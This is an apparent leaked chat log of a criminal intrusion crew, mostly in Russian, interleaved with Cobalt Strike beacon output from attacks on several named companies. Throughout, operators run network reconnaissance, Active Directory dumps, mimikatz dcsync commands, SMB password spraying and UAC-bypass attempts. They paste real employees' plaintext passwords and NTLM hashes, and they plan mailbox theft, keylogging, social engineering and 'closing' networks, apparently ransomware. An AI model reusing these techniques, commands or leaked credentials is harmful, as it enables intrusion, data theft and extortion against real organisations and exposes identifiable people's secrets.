Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 204ms, Maximum = 204ms, Average = 204ms
``даже так, еще один всус жив``
Pinging AUB-WSUS-16.eu.panavision.com [172.16.1.120] with 32 bytes of data:
Reply from 66.45.62.99: Destination net unreachable.
Ping statistics for 172.16.1.120:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
[+] received output:
Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data:
Reply from 192.168.33.101: bytes=32 time=157ms TTL=251
Ping statistics for 192.168.33.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 157ms, Maximum = 157ms, Average = 157ms
``````
The genuine xagt.exe file is a software component of FireEye Endpoint Security by FireEye.
FireEye Endpoint Security is a single-agent security solution that protects endpoint systems from online threats. Xagt.exe runs a core process associated with FireEye Endpoint Security. Disabling this process may cause issues with this program
``если бы мой англ был хуже чем 0, я бы перевел как горящая жопа[ ](https://mediaeveryone.com/group/panavision-com?msg=ChvqBYADCYspYbbPi) так огенный глазтакая штука есть``
> Sage
AUB-SAGE-16
``кстати
а что с авером в сети?давай-ка посмотрим что на нем)ага рабочий``
Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data:
Reply from 192.168.1.85: bytes=32 time=204ms TTL=251
Ping statistics for 192.168.1.85:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 204ms, Maximum = 204ms, Average = 204ms
```во
интересноSCCM больше нет кроме того, которого не существуетвот этот WSUS``
beacon> shell ping -n 1 SYD-WSUS-01
[*] Tasked beacon to run: ping -n 1 SYD-WSUS-01
```есть надежда)1 на 4 домена получаетсяхреновато...поэтому может он под другим именем``
beacon> shell ping -n 1 DEN-SCCM-01
[*] Tasked beacon to run: ping -n 1 DEN-SCCM-01
beacon> shell ping -n 1 DEN-WSUS-01
[Tasked beacon to run: ping -n 1 DEN-WSUS-01
[+] host called home, sent: 104 bytes
[+] received output:
Ping request could not find host DEN-SCCM-01. Please check the name and try again.
[+] received output:
Ping request could not find host DEN-WSUS-01. Please check the name and try again.
``````
dn:CN=DEN-WSUS-01,OU=Disabled Computers,DC=na,DC=panavision,DC=com
dn:CN=DEN-SCCM-01,OU=Disabled Servers,DC=na,DC=panavision,DC=com
``тут такое делобычно подписан просто как WSUSкто? WSUS сервак?он как-то может выделяться из ад компс по СПН?лол) окейвернотипо 1 сервер можеть одним WSUS на несколько доменов?включая карантинSCCM / WSUS сервера часто под разными хостнеймами присутствуют во всех доменах лесану датипо WSUS будет доверенным сервером т к видит ДНС сервер карантина?не совсем понимаю как?поснимай, они могуть видеть карантинснимать со всех текущих доменов?неаснимал ДНСы с SCCM/WSUS ?есть мысли как?бля
надо искать вход...без проблем``
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)]
>trustAttributes: 4 [Quarantined-Domain(4)]
```напомни как он называется пожалуйстав карантиный домен лезть не надо?бекапы найдены?так что теперь по плану?```
eu.panavision.com
=================
> Domain Controller
AUB-DCON-01
PRK-DCON-01
PRK-DCON-02
GFD-DCON-01
GFD-DCON-02
EUR-DCON-01
GFD-DCON-16
--------------------
> File Servers
PRA-FILE-01
PRK-FILE-01
AUB-FILE-01
AUB-FILE-02
GFD-FILE-01
AUB-FILE-04
FR-SPARESERVER
MAN-FILE-02
PRV-FILE-02
WTL-FILE-02
--------------------
> Sage
AUB-SAGE-16
--------------------
> SQL
PA-SDS-01
EUR-DOMS-01
EUR-ACMS-01
EUR-MSQL-14
AUB-WEB-01
GFD-ACMS-02
PA-INTB-01
PRK-ITMS-01
--------------------
> UAG Server
EUR-FUAG-01
--------------------
> Insphire Server
EUR-INSP-01
--------------------
> Hyper-V
AUB-HYPV-01
AUB-HYPV-01
AUB-HYPV-02
GFD-HYPV-05
GFD-HYPV-06
AUB-HYPV-04
PRK-HYPV-03
--------------------
> Remote Desktop Services Server/Credit Host
EUR-RDS-04
EUR-RDSH-08
EUR-MRDS-01
EUR-RDSB-01
EUR-RDSH-01
EUR-RDSH-02
EUR-RDSH-03
EUR-RDSH-04
EUR-RDSH-05
EUR-RDSB-02
EUR-RDSB-03
EUR-RDSH-06
EUR-RDSH-07
--------------------
> Interbase Database Server
GBL-INTR-01
GBL-INTR-02
--------------------
> WSUS
AUB-WSUS-16
EUR-WSUS-16
--------------------
> Terminal Server License Servers
EUR-LHPV-01
EUR-LHPV-02
EUR-LHPV-03
--------------------
> ATS Server
PA-PRTSVR
--------------------
> Disabled Computers
PRK-SRCE-01
PRK-BUILD-01
PRK-CBLD-01
PRK-CSYS-01
PRK-CVCS-01
PRK-HPV-01
EUR-LRAH-01
EUR-LRAH-02
EUR-DCON-02
--------------------
> Failover cluster virtual network name account
PRK-CLST-12
GDF-CLST-01
--------------------
> Lexicon
(Web Hosting, eCommerce Solutions, Peace of Mind. LexiConn provides personal service, expert, in-house support, and rock solid hosting solutions designed to grow and evolve with the needs of your business)
EUR-LRAH-03
EUR-LRCB-01
EUR-LRAH-04
EUR-LRAH-05
--------------------
> Unavailable
EUR-LEE-01
EUR-LEE-02
EUR-LEE-03
EUR-LEE-04
EUR-MDPM-01
GFD-CORESRV-01
--------------------
> w3wp
EUR-LREP-01
EUR-LSRV-02
EUR-LSRV-06
EUR-LSRV-07
EUR-LSRV-08
EUR-LSRV-09
--------------------
> PDQ
EUR-ITMS-12
--------------------
???
AT-SRV-APPS-1
EUR-CSYS-01
EUR-CVCS-01
GFD-ALCT-01
``спроси у коллег, там по моему рце находили?и это только чекеря нашел, но он чекает только по 1 ip за разнуу, я не проверял)смбгост мимо?вобщем по этой сетке
моя последня надежда на зерологон(который не пачнули после последнй попытки лол)
чтобы снять dcsync надо делать токен через pth, но т.к. нет системы - не выйдет
```
mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. /authpassword:"" /authntlm
```
вот эта строка не работает походу потому что в CS старый мимик
а новую версию на машину не уровнить т.к. видит как вирус.у нас есть только один валидный пользователь который ходит по смб на 10.7.20.30 - и хз что за машина(он там локальный пользак)если вы сняли ad_users.txt я уж понял что у вас есть логины))только логинынашли ДА без паролейДА нашли = логин и пароль валидныЛогин ДАмы в домен залезть не можемДА нашли (нашли их логины)ну т е тут все ок, пока ищите ДАПодключились к впнтак вы не подключились к впн?за vpnпо локальной)или по какой сети вы гуляете?проверили локальных админов, учетки ДА на найденные пароли> Подняли vpn, через наш дедик гуляем по сети
я не так читаю эту фразу?Нашли к домену не подключенныДА нашли?в домен пролезли?проверили по smb админаПодняли vpn, через наш дедик гуляем по сети, смотрим что есть, сканируем на ms17как успехи?``
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'WORKSTATION\Louisad:M@tches2020!!'
``description
```
Prod App read only (Matches2014) - prodappread
Test account for app pw matches123 - ipadvpn
iTunes Account for Richmond stores (Matches123) - richapp
```DA``
LDAP_SEARCH_S: 0x34
LDAP_SEARCH_S: Unavailable
ERROR: Couldn't gather RootDSE Info...
Terminating program.
``````
adfind.exe -f "(objectcategory=person)" -h 10.1.4.30 > ad_users.txt
adfind.exe -f "objectcategory=computer" -h 10.1.4.30 > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" -h 10.1.4.30 > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet) -h 10.1.4.30 > subnets.txt
adfind.exe -f "(objectcategory=group)" -h 10.1.4.30 > ad_group.txt
adfind.exe -gcb -sc trustdmp -h 10.1.4.30 > trustdmp.txt
```его не существует в домене и вы пытаетесь сделать запросы к ДК с запрещенного пксуть в том, что вы не можете снять АД, т к ваш пк в воркгуппедавы там подняли впн?а, вы дедик притянулиэто дедикваши файлы?```
Directory of C:\users\Administrator\Desktop
09/28/2020 03:23 PM .
09/28/2020 03:23 PM .
09/28/2020 03:24 PM 391 ad.bat
09/28/2020 03:22 PM 1,394,176 AdFind.exe
09/28/2020 01:55 PM 4,554 io.xml
09/23/2020 12:33 PM 303,098 kali-linux-2020.3-installer-amd64.iso.torrent
09/28/2020 02:55 PM 27 LEHA.txt
09/28/2020 01:55 PM 0 New Text Document.txt
09/28/2020 02:12 PM 935 Nmap - Zenmap GUI.lnk
09/28/2020 02:21 PM 7,978 nmap.7z
09/28/2020 02:19 PM 188,255 nmap.xml
09/23/2020 12:32 PM 867 µTorrent.lnk
``для начала попробовать рестартнуть@tl1что это может быть в смб_логине``
Error: 10.20.4.78: Errno::EISDIR Is a directory @ io_fillbuf - fd:52 /home/user/Desktop/cobalt
``[ ](https://mediaeveryone.com/group/matches?msg=bsWTgZB5hY8rthErT) нет, но не находит``
====== MappedDrives
Mapped Drives (via WMI)
LocalName : p:
RemoteName: \\ho-fs01.matches.com\press
RemotePath : \\ho-fs01.matches.com\press
Status : Unavailable
ConnectionState : Disconnected
Persistent : True
UserName :
Description : RESOURCE REMEMBERED - Microsoft Windows Network
LocalName : y:
RemoteName : \\HO-FS01.matches.com\department
RemotePath : \\HO-FS01.matches.com\department
Status : Unavailable
ConnectionState : Disconnected
Persistent : True
UserName :
Description : RESOURCE REMEMBERED - Microsoft Windows Network
```а он не пустой?
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:faf5481720d381d2405ef4194ddb4770:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9:::
``````
Domain: UKHECSLT3028
Login: Administrator
Password: 192837465S!
NTLM: f490c4823837a7d002e0176f3c5203ad
Domain : MATCHES
Login : mercedesd
Password: Dinham2323
NTLM : 7c839aa54221edb65e959f18ab9bde41
Domain : MATCHES.COM
Username : Louisad
Password: M@tches2020!!
NTLM: f74bc7faf8ddfbedb1441e9e42cdbb1c
``Отлично)+поднялся впн?всё норм это бабаесли вы хотите его пк подключить он может заметить что впн резко врубилсяможет и установочник лежит на ПКпоищите домен для подключения, доменные креды у вас естьразверните впн на дедике``
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:
Windows IP Configuration
Host Name . . . . . . . . . . . . : UKHOEVLT3156
Primary Dns Suffix . . . . . . . : matches.com
Node Type . . . . . . . . . . . . : Mixed
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : matches.com
Home
Ethernet adapter Ethernet 3:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Description . . . . . . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter
Physical Address. . . . . . . . . : 00-09-0F-AA-00-01
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Ethernet:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : matches.com
Description. . . . . . . . . : Intel(R) Ethernet Connection (6) I219-V
Physical Address. . . . . . . . . : 00-68-EB-67-1A-A2
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter Local Area Connection* 1:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
Physical Address. . . . . . . . . : 04-ED-33-E4-5F-2B
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter Local Area Connection* 10:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2
Physical Address. . . . . . . . . : 06-ED-33-E4-5F-2A
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Ethernet 2:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Description . . . . . . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30)
Physical Address. . . . . . . . . : 00-09-0F-FE-00-01
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter WiFi:
Connection-specific DNS Suffix : Home
Description . . . . . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz
Physical Address. . . . . . . . . : 04-ED-33-E4-5F-2A
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0(Preferred)
IPv6 Address. . . . . . . . . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0(Preferred)
Temporary IPv6 Address. . . . . . : 2a02:c7d:a28:5100:5ce0:5b5c:1236:fc08(Preferred)
Temporary IPv6 Address. . . . . . : fdb0:64:3df8:0:a9ec:ba3a:d314:b55e(Preferred)
Link-local IPv6 Address . . . . . : fe80::7de6:b515:bbeb:89c0%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.0.80(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, September 27, 2020 12:33:55 PM
Lease Expires . . . . . . . . . Tuesday, September 29, 2020 9:42:09 AM
Default Gateway . . . . . . . . fe80::7e4c:a5ff:fef9:c2a0%11
192.168.0.1
DHCP Server . . . . . . . . . . . : 192.168.0.1
DHCPv6 IAID . . . . . . . . . . : 201649459
DHCPv6 Client DUID. . . . . . . . : 00-01-00-25-72-B4-85-00-68-EB-67-1A-A2
DNS Servers . . . . . . . . . . . : fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0
192.168.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
````UKHOEVLT3156\Administrator faf5481720d381d2405ef4194ddb4770``MATCHES.COM\Louisad M@tches2020!!`слишком здоровый, вот и завернулесли вмещается в сообщении зачем заворачивать в файл?)``
URL : https://login.microsoftonline.com/common/login
Username : louisa.davies@matchesfashion.com
Password : Basil1234
```
скорее всего доменные креды.есть сессияtobi pizda)Морально я с вами парни) и оптимизируем действия чтобы сократить лишнее и бесполезнону дорабатываем/перебатываем всю солянку что у меня на винче из "рабочего" грубо говорясвязаный с разработкой полного авторского тулкита который мы пилимя сейчас сделаю канальчик один тематический
можно на пол часика будет отвлечься ради маленькой дискуссикроме юзер 7даребята, а все на месте сейчас?проекция лоигики прописанной в ОУ и групах на результаты сканирования с разных поинтовпоробуйте понять логику расположения "железок" которые блокируют порты
это может быть по физическому расположению, назначению функциональному, назначению "по отделам", просто железки между серверными и юзер сегментами
зачастую в таких сетях много ДК и подсети изолированы друг от друга но домен контроллеры нет для успешной репликациии почти никогда не ставятся на "машину технаря "фаеры ставятся на сегментыищите маршрутправильное решение - администрирование фаерволов сетевых которые запрещают входящие коннектыда и не факт что пропустит все равно это вряд ли сработает потому что нтлм рилей в текущем его состоянии может "бить" только на другую машину помимо той откуда инициируется коннектток спуфом каким-то чтобы не просто закепчурить а именно зарелеить авторизацюи с этой машиныникаки как это "запрещены входящие подключения"?
закрыты все порты? все порты?
но при этом мы смогли внедриться в сессию
```
в "исходящую" сессию?у меня вопрос, почему не сделать биндом?пока нетпока работаем в тех что были, но если есть новые - ждемнеа)нигде?вроде нету ДАа там где ДА?2 сетки близкие к тупикусесси для работы есть?долгоКак itc?ПриветВсем приветсегодня потолок это еще часик, готовим нехватку даных, завтра к обедугоспода, мне надо отойти по делам, я так понимаю что чем заняться есть, пишите, если чем смогу помочь подсказать - обязательно подскажу как вернусьhttps://www.stellarinfo.com/blog/exchange-mailbox-backup-using-powershell-cmdlets/?то есть условных технарей парочку .pst дернуть и окмм
не подскажу... я обычно выкачивал просто целевые ящики через EAC@tl2
вопрос по
>3) бэкап почтового сервера
получается подтянул я сервер с именем `Exchange.rtpco.local`
захожу в `C:\Program Files\Microsoft\Exchange Server\V15\Mailbox`
и выкачиваю вот это вотф дергали, хром же не расшифруем без мастеркеяподергайте браузеры у админов аккуратно без кобальт сессийкарбон злобный - факта, ну еще у них нет эксчейнджа, надо почту искатьпо #evo-com там все готово кроме двух насов в вокргрупе, их надо искать в браузерах админов, мы пока смотрели там только фс и ФФ, т.к. никуда не прыгали по машинам, работали с дедика по впном. Каброн все видит, так что если прыгнем куда-то- пойдет обраный отсчет и в этот же день ее надо закрывать. А время там -11, так что начинать надо где то в 9 - 10 утра.сегодня вообще по идее с трёхони еще не пришлиэто к @user3 и @user9
вроде они с этой сеткой работаютпо #evo-com как обстановка?привет
по #rtpcompany-com
нашлась куча esxi, которых в прошлый раз не обнаружили, и креды для них, осталось, вроде как, закончить с дополнительными задачами (скуль, эксч, etc)
по #waterway-com
так и не выцепили креды от нимблов, они их походу реально на бумажке передают, на айтишниках стоит кейлог, один из них в пятницу пытался и не смог зайти на нимбл, потом полез в ластпасс и сам себя там залочилподскажите какой прогресс был в конце прошлой недели по текущим задачам@tl1 сегодня отсутствует - так что я подменяювсем приветпока даникак не пробится? пока забили на эту сетку?`USIDgfs867gfusydkGTTKJUg`готовбилд?кобы потом стрешим+я думаю до 3+- еще поресерчим сеть и там уже можно будет начинатьтогда закроем сегоднянеа, в виме не подлкючен
по софту кроме вима ничегооблачных решений не нашли?по клаудам как?окейда а вообще он нам не так уж и нужен
посмотреть все хосты?
мы нашли два и в виме бэкапятся так же два[ ](https://mediaeveryone.com/group/overland-com?msg=5QfnebYASzT2PbuXp) сабнеты просканили, там нет намеков на центрещё `TESTLAB-PACKV9` но до неё вообще не достучатьсямне попались тачки
```
TEST044-R002V9
TEST044-R002
``для линукса вроде есть способ...а есть способ по гостевой тачке определить на каком хосте она крутится?мб вмцентр вне домена, все посмотрели?``
https://10.69.0.51/restgui/start.html``
```
```вообщем
центра управления хостами hyper-v, по всей видимости, нет
всего два хоста, на них крутятся 34 виртуалки, включенных +- половина
по ад серверов 76, еще не пинговали но по ощущениям так же мало живых
бэкапят они на diskstation(10.69.0.22) в основном файлопомойку и иногда сервера.
каких то еще бэкапов пока невидно``
http://10.69.0.90:5000/
```как обычно)да разобрались уже, смотрел только на ` Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),`так его не существуетReply from 10.69.201.15: Destination host unreachable.```
beacon> shell ping 10.69.201.21
[*] Tasked beacon to run: ping 10.69.201.21
[+] host called home, sent: 49 bytes
[+] received output:
Pinging 10.69.201.21 with 32 bytes of data:
Reply from 10.69.201.15: Destination host unreachable.
Reply from 10.69.201.15: Destination host unreachable.
Reply from 10.69.201.15: Destination host unreachable.
[+] received output:
Reply from 10.69.201.15: Destination host unreachable.
Ping statistics for 10.69.201.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```[ ](https://mediaeveryone.com/group/overland-com?msg=mwdZmFecWDkt7TjDc) С этой же подсети[ ](https://mediaeveryone.com/group/overland-com?msg=Xfgnbd6C2RFa7d3Wo) beacon> shell ping -n 1 10.69.201.21
[Tasked beacon to run: ping -n 1 10.69.201.21
[+] host called home, sent: 53 bytes
[+] received output:
Pinging 10.69.201.21 with 32 bytes of data:
Reply from 10.69.201.15: Destination host unreachable.
Ping statistics for 10.69.201.21:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),и откуда пингуетедайте ответ на пингно смысл в портскане тогда?)да[ ](https://mediaeveryone.com/group/overland-com?msg=2CWKmH8yR33F2viCj) не понял вопроса? Покажет ли телнет что 22 порт открыт если сделать так telnet server_name 22 Думаю покажет``
beacon> portscan 10.69.201.21 445,443,5000 icmp 1024
[*] Tasked beacon to scan ports 445,443,5000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
beacon> portscan 10.69.201.21 22 icmp 1024
[*] Tasked beacon to scan ports 22 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
beacon> portscan 10.69.201.21 80 icmp 1024
[*] Tasked beacon to scan ports 80 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
beacon> portscan 10.69.201.21 1-1000 icmp 1024
[*] Tasked beacon to scan ports 1-1000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
beacon> portscan 10.69.201.21 1001-5000 icmp 1024
[*] Tasked beacon to scan ports 1001-5000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
beacon> portscan 10.69.201.21 5001-10000 icmp 1024
[*] Tasked beacon to scan ports 5001-10000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```дайте ответ пингаа 22 открыт для телнета?)Я не помню как я делал, в моем случае пинга нет на ip. конечно можно чекнуть телнетом) От него вроде не утаишь)реплика на пинг отключается и внутри настроек самой системыпочему это?По моему он не должен пинговатся в таком случаемб нет открытых портов с точки сканаСтранный ip нет открытых портов 10.69.201.21http://10.69.0.22:5000/ nas c бэкапами (admin:CR@CKer$) фс видно от ДАэтот пароль на админ учетку из двух доменов`CR@CKer$`их нетскинь плз еще дисинки с этих доменовВсе живые ovrecomm.com
```
OVRECOMMAD01.ovrecomm.com
ovrdb2.ovrecomm.com
ovrdb1.ovrecomm.com
OVRECOMMAD02.ovrecomm.com
OVRDB1A.ovrecomm.com
OVRSCDB1.ovrecomm.com
``Все живые ovrweb.com
```
OVRWEBAD01.ovrweb.com
ovrweb1.ovrweb.com
rweb2.ovrweb.com
OVRWEBAD2.ovrweb.com
OVRWEBAD02.ovrweb.com
OVRWEB2A.ovrweb.com
OVRWEB1A.ovrweb.com
OVRSCWeb1.ovrweb.com
OVRSCWeb2.ovrweb.com
OVRSCWeb3.ovrweb.com
``нетпо задачам вопросы есть?+прилетела+и у вас будут все 3тогда прилетит еще одна из друго домена+у вас моя первая сессия осталась?nullpin.comдомен)кобу или домен?кобу дайтеходите тоже тихо, сессии со всех пк не тяните, можете переснять ад и проверить доступность хостовы там не снимаете дсинк и хешиспокойной ночиДо завтраок, до заврабзавтра к 6+ дам еще 2 домена посмотретьфинально проверим все тут и закроем полноценноперенесем на завтра закрытие тогдатак окейвидимо умер``
dn:CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>objectClass: computer
>cn: SYSTEMCENTER
>distinguishedName: CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com
>instanceType: 4
>whenCreated: 20190613140038.0Z
>whenChanged: 20201117102629.0Z
>uSNCreated: 36464435
>uSNChanged: 46733431
>name: SYSTEMCENTER
>objectGUID: {11A33782-FF53-4D61-B6ED-92C585B680CC}
>userAccountControl: 4096
>badPwdCount: 0
>codePage: 0
>countryCode: 0
>badPasswordTime: 0
>lastLogoff: 0
>lastLogon: 132502892466357264
>localPolicyFlags: 0
>pwdLastSet: 132498579429186892
>primaryGroupID: 515
>objectSid: S-1-5-21-917468999-1386106184-2076119496-6860
>accountExpires: 9223372036854775807
>logonCount: 439
>sAMAccountName: SYSTEMCENTER$
>sAMAccountType: 805306369
>operatingSystem: Windows Server 2016 Standard
>operatingSystemVersion: 10.0 (14393)
>dNSHostName: SystemCenter.overland.com
>servicePrincipalName: WSMAN/SystemCenter.overland.com
>servicePrincipalName: WSMAN/SystemCenter
>servicePrincipalName: TERMSRV/SystemCenter.overland.com
>servicePrincipalName: TERMSRV/SYSTEMCENTER
>servicePrincipalName: RestrictedKrbHost/SYSTEMCENTER
>servicePrincipalName: HOST/SYSTEMCENTER
>servicePrincipalName: RestrictedKrbHost/SystemCenter.overland.com
>servicePrincipalName: HOST/SystemCenter.overland.com
>objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=overland,DC=com
>isCriticalSystemObject: FALSE
>dSCorePropagationData: 20200409185421.0Z
>dSCorePropagationData: 20190731210520.0Z
>dSCorePropagationData: 20190731210518.0Z
>dSCorePropagationData: 16010101181633.0Z
>lastLogonTimestamp: 132500823894234705
>msDS-SupportedEncryptionTypes: 28
``````
Ping request could not find host SystemCenter.overland.com. Please check the name and try again.
```в ад)а где ты его увидел?а это что за хост?SYSTEMCENTERконсоль veeam, облако не подключено``
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : overland\administrator
Credential :
LastModified : 1/21/2016 8:52:52 PM
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://login.microsoftonline.com/
Identity : azureadadmin@overlandsheepskin.onmicrosoft.com
Credential :
LastModified : 3/16/2018 6:46:12 PM
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : administrator
Credential :
LastModified : 4/4/2017 7:35:39 PM
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : todd@overland.com
Credential :
LastModified : 1/16/2019 3:56:37 PM
```и там решим что делатьтогда пол часа еще на проверкусканим пока сетьтам гиперви сервера и хз где сфера и есть она вообщеНайти сферу, и чекнуть повторно сферы + есть подозрение что нас 10.69.0.90:5000 но он отключенсегодня закроем?`Elar1n22````
todd@mail.overland.com
OVERLAND\todd Elar1n55
``до завтраокей, до завтраДо завтрану значит на сегодня можно сворачиватьсяу3пали сессии1) посмотреть шары на предмет интересных файлов и скриптов содержащих другие креды
2) побрутить на популярные пассы sa акк на mssql серверах
3) посмотреть сетевые устройства на наличие доступа к ним по дефолтным паролям(роутеры/свитчи)что можно сделать? @tl2 @tl1elevate не работаетЛА, а юак обходить не хочетдоменный, но ЛА на своей тачкене имею понятия, пустил брут, до сих пор идёт, это было в первых строкаха SBolley разве не доменный пользователь?DC
```
[+] 192.168.90.6:445 - 192.168.90.6:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.11.42:445 - 192.168.11.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.110.42:445 - 192.168.110.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 10.220.136.40:445 - 10.220.136.40:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.30.42:445 - 192.168.30.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.11.43:445 - 192.168.11.43:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 10.200.132.52:445 - 10.200.132.52:445 - Success: '.\SBolley:thisduckingsucks!02'
```user8user4user3https://www.exploit-db.com/exploits/3220`spoolsv.exe`
вот такой процесс естьпоробуйте реализацию на шарпе что я скинул вышетакое может бытьполагаю алертит на необфусцированный пейлоад в б64 енкодеfodhelper на шарпе``
https://github.com/FatRodzianko/SharpBypassUAC
```ну и все отслаьыне тоже попробовали````
beacon> audit_uac
[*] Tasked Beacon to audit UAC settings
[+] host called home, sent: 149229 bytes
[+] received output:
[+] SBolley is a local Administrator!
[Info] DETSBOLLEY23063 is Windows 10.0.18363.
[+] Invoke-SluiBypass should work to bypass UAC.
[+] Invoke-FodhelperBypass should work to bypass UAC.
[+] Invoke-TokenDuplication should work to bypass UAC.
``` `
Invoke-FodhelperBypass - блочится AV
Invoke-SluiBypass - повесил сеиию
Invoke-TokenDuplication - не работаетвсе elevate методы не помогли?не получается пройти уак, ищем какестьЖивые люди тут есть?и он ругается на закодированую команду, он ругается на параметр `-Command`для чего это вообще?Как продвигается?да, не трогайтеможете работатьприлетела``
>memberOf: CN=SQL Financial
User: DBunte - IP Address: 192.168.90.2
User: Melissa - IP Address: 192.168.0.126
User: Melissa - IP Address: 192.168.0.28
User: srethmeier - IP Address: 192.168.0.124
User: achackes - IP Address: 192.168.0.61
```пока нашёл только >memberOf: CN=SQL Financialищу у кого выигрышнее дёрнуть точечноэксч серва не нашёлтут подготовите завтра?ну и почтаб но это все надо прям в сети делатьмогу вам предложить завтра закрыть все 3)у нас и в \ evo почти все готово, кроме пары насовпоэтому эти обе готовимони туда не часто гоняютут смысла ждать нет у моря погодыв таком духенаписать чет мой пароль не подходита-ля "ты че дурак он у тебя на стикере на мониторе "чтобы все было готовоэто надо делать все в день закрытияон может всякое ответитьтут все в моменте)очень опаснои вылетаем сразуахас одного айтишника напишем другому какой пасс от нимблалибо попробуем СИплан такой, мы либо закроем без нимбла но надо даныеэта тожетут есть бэкап .pst одного айтишникалично я пока в приорите с #rtpcompany-com работаю, так как она ближе к закрытиюпомимо нимбла остальное готово? бэкапы и прочеепока ничеготут у нас что?И распишите себе mindmap по поднятию прав от ЛП до ДАНапишите в ЛС подробные отчеты о проделанной работе за последние 2-3 дня. Пока можете заняться организацией записей по модулям и прочему, так же написать себе мануал по всем векторам которые были и в каком порядке лучше действовать. Заканчиваем в 20:00 сегодняhttps://fixmypc.ru/post/kak-naiti-zaloginenykh-polzovatelei-i-aktivnye-sessii-s-powershell/если работает нагрузка `beacon_reverse_tcp` в `Windows Executable (S)` который прошел через `shellConcatenation.1.0.0`, но при этом не работает через `rportfwd` скорее всего дело в самом `rportfwd`[ ](https://mediaeveryone.com/channel/general?msg=mQY8BtgM65Eh6Tpz6) а проверяли на обычном https листе? или уже на rportfwd?а чем не нравится `Attack -> Packages -> Payload Generator`?он в 255 раз большеДа, но не уверен, что сам `shellConcatenation.1.0.0` поддерживает такой размер файла RAW)а по поводу `rportfwd` не совсем понял
```
beacon> help rportfwd
Use: rportfwd [bind port] [forward host] [forward port]
rportfwd stop [bind port]
Binds the specified port on the target host. When a connection comes in,
